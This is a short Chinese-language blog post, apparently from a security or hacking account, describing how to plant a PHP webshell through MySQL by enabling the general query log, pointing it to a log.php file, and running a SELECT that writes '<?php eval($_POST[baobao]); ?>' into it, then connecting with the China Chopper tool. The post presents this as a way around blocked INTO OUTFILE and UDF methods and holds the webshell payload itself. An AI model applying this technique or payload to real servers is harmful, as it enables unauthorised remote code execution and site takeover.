MySql拿webshell的另一种手段

大多数的用户在对于mysql拿webshell的手段依旧停留在into outfile上面或者是导入udf提权，但是随着数据库版本的提升就导致了这些手法都失去了作用。

那么现在步入正题，本次要介绍的是通过Mysql日志文件来备份Webshell。默认情况下这个功能是被关闭的。

此时我们将这个功能设置为On

此时我们所有操作的SQL语句均会被记录在日志文件中。

此时我们修改日志文件的保存路径

此时我们的日志文件便会以log.php文件名保存

访问一下文件

现在我们直接按照into outfile那种思路来直接查询 SELECT  ‘<?php eval($_POST[baobao]); ?>’;

用菜刀连接日志文件

以上就是本次的内容

      扫描下方二维码关注我们